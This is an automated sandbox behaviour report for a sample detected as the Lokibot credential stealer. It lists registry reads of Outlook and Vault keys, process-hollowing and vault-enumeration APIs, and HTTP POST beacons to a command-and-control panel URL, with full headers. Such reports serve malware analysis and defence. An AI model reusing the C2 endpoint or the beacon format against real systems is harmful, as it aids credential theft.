HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges

Write Keys

Nothing to display

Delete Keys

Nothing to display

Mutexes

D448845E628773E4A9A809DA

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
clr.dll.SetRuntimeInfo
clr.dll._CorExeMain
mscoree.dll.CreateConfigStream
mscoreei.dll.CreateConfigStream
kernel32.dll.GetNumaHighestNodeNumber
kernel32.dll.GetSystemWindowsDirectoryW
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddSIDToBoundaryDescriptor
kernel32.dll.CreateBoundaryDescriptorW
kernel32.dll.CreatePrivateNamespaceW
kernel32.dll.OpenPrivateNamespaceW
kernel32.dll.DeleteBoundaryDescriptor
kernel32.dll.WerRegisterRuntimeExceptionModule
kernel32.dll.RaiseException
mscoree.dll.#24
mscoreei.dll.#24
ntdll.dll.NtSetSystemInformation
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.GetNativeSystemInfo
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
clrjit.dll.sxsJitStartup
clrjit.dll.getJit
kernel32.dll.LocaleNameToLCID
kernel32.dll.LCIDToLocaleName
kernel32.dll.GetUserPreferredUILanguages
nlssorting.dll.SortGetHandle
nlssorting.dll.SortCloseHandle
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcess
kernel32.dll.GetTempPathW
ole32.dll.CoTaskMemAlloc
ole32.dll.CoTaskMemFree
kernel32.dll.GetFullPathNameW
cryptsp.dll.CryptGetDefaultProviderW
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
kernel32.dll.SetThreadErrorMode
kernel32.dll.CreateFileW
kernel32.dll.GetFileType
kernel32.dll.WriteFile
kernel32.dll.GetFileAttributesExW
kernel32.dll.GetCurrentDirectoryW
kernel32.dll.GetStdHandle
kernel32.dll.GetEnvironmentStrings
kernel32.dll.GetEnvironmentStringsW
kernel32.dll.FreeEnvironmentStringsW
kernel32.dll.GetACP
kernel32.dll.UnmapViewOfFile
kernel32.dll.CreateProcessW
kernel32.dll.DuplicateHandle
kernel32.dll.GetExitCodeProcess
kernel32.dll.GetFileSize
kernel32.dll.ReadFile
kernel32.dll.DeleteFileW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
kernel32.dll.FindResourceA
kernel32.dll.SizeofResource
kernel32.dll.LoadResource
kernel32.dll.LockResource
gdiplus.dll.GdiplusStartup
kernel32.dll.IsProcessorFeaturePresent
user32.dll.GetWindowInfo
user32.dll.GetAncestor
user32.dll.GetMonitorInfoA
user32.dll.EnumDisplayMonitors
user32.dll.EnumDisplayDevicesA
gdi32.dll.ExtTextOutW
gdi32.dll.GdiIsMetaPrintDC
gdiplus.dll.GdipCreateBitmapFromStream
windowscodecs.dll.DllGetClassObject
kernel32.dll.WerRegisterMemoryBlock
gdiplus.dll.GdipImageForceValidation
gdiplus.dll.GdipGetImageRawFormat
gdiplus.dll.GdipGetImageWidth
gdiplus.dll.GdipGetImageHeight
gdiplus.dll.GdipBitmapGetPixel
shell32.dll.SHGetFolderPathW
kernel32.dll.CompareStringOrdinal
clr.dll.CreateAssemblyNameObject
ole32.dll.CoGetObjectContext
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
ole32.dll.NdrOleInitializeExtension
ole32.dll.CoGetClassObject
ole32.dll.CoGetMarshalSizeMax
ole32.dll.CoMarshalInterface
ole32.dll.CoUnmarshalInterface
ole32.dll.StringFromIID
ole32.dll.CoGetPSClsid
ole32.dll.CoCreateInstance
ole32.dll.CoReleaseMarshalData
ole32.dll.DcomChannelSetHResult
rpcrtremote.dll.I_RpcExtInitializeExtensionPoint
clr.dll.CreateAssemblyEnum
kernel32.dll.ResolveLocaleName
kernel32.dll.LoadLibraryA
kernel32.dll.WideCharToMultiByte
kernel32.dll.GetProcAddress
kernel32.dll.GetModuleHandleA
advapi32.dll.LookupPrivilegeValueW
advapi32.dll.AdjustTokenPrivileges
ntdll.dll.NtQuerySystemInformation
kernel32.dll.CreateProcessA
kernel32.dll.GetThreadContext
kernel32.dll.Wow64GetThreadContext
kernel32.dll.SetThreadContext
kernel32.dll.Wow64SetThreadContext
kernel32.dll.ReadProcessMemory
kernel32.dll.WriteProcessMemory
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.VirtualAllocEx
kernel32.dll.ResumeThread
ole32.dll.CoUninitialize
oleaut32.dll.#500
advapi32.dll.EventUnregister
gdiplus.dll.GdipDisposeImage
cryptsp.dll.CryptReleaseContext
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
kernel32.dll.QueryActCtxW
kernel32.dll.GetProcessPreferredUILanguages
kernel32.dll.GetUserDefaultUILanguage
version.dll.GetFileVersionInfoSizeA
version.dll.GetFileVersionInfoA
version.dll.VerQueryValueA
alink.dll.CreateALink
mscoree.dll.CLRCreateInstance
mscoreei.dll.CLRCreateInstance
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
clr.dll.DllGetClassObjectInternal
clr.dll.StrongNameTokenFromPublicKey
clr.dll.StrongNameFreeBuffer
clr.dll.CompareAssemblyIdentityWithConfig
clr.dll.CreateAssemblyConfigCookie
clr.dll.DestroyAssemblyConfigCookie
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptDestroyKey
mscorpehost.dll.InitializeSxS
mscorpehost.dll.CreateICeeFileGen
mscorpehost.dll.DestroyICeeFileGen
ole32.dll.CoCreateGuid
diasymreader.dll.DllGetClassObject
rpcrt4.dll.UuidCreate
kernel32.dll.NlsGetCacheUpdateCount
ole32.dll.CreateStreamOnHGlobal
mscoree.dll.CorExitProcess
mscoreei.dll.CorExitProcess
vaultcli.dll.VaultEnumerateItems
vaultcli.dll.VaultEnumerateVaults
vaultcli.dll.VaultFree
vaultcli.dll.VaultGetItem
vaultcli.dll.VaultOpenVault
vaultcli.dll.VaultCloseVault
netapi32.dll.NetUserGetInfo
cryptsp.dll.CryptSetKeyParam
cryptsp.dll.CryptDecrypt

Execute Commands

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.cmdline"
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Seven01\AppData\Local\Temp\RESA661.tmp" "c:\Users\Seven01\AppData\Local\Temp\CSC322517D57E1C4C98B6C2462FF1F8FDB.TMP"
C:\Windows\system32\lsass.exe

Started Services

VaultSvc

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven06_64 Seven06_64 VirtualBox 2018-06-25 21:39:47 2018-06-25 21:43:03 196

2 HTTP Request(s) detected

http://abatii.web.id/apaci/Panel/five/fre.php
  • Hostname: abatii.web.id
  • IP Address: 10.1.26.180
  • Port: 80
  • Count: 2

POST /apaci/Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: abatii.web.id
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: DABC2C1C
Content-Length: 192
Connection: close

http://abatii.web.id/apaci/Panel/five/fre.php
  • Hostname: abatii.web.id
  • IP Address: 10.1.26.180
  • Port: 80
  • Count: 12

POST /apaci/Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: abatii.web.id
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: DABC2C1C
Content-Length: 165
Connection: close

#infosec #automation

TheSystem Itself @ 2018-06-25 21:42:25

Detected family: #Lokibot

TheSystem Itself @ 2018-06-25 21:48:04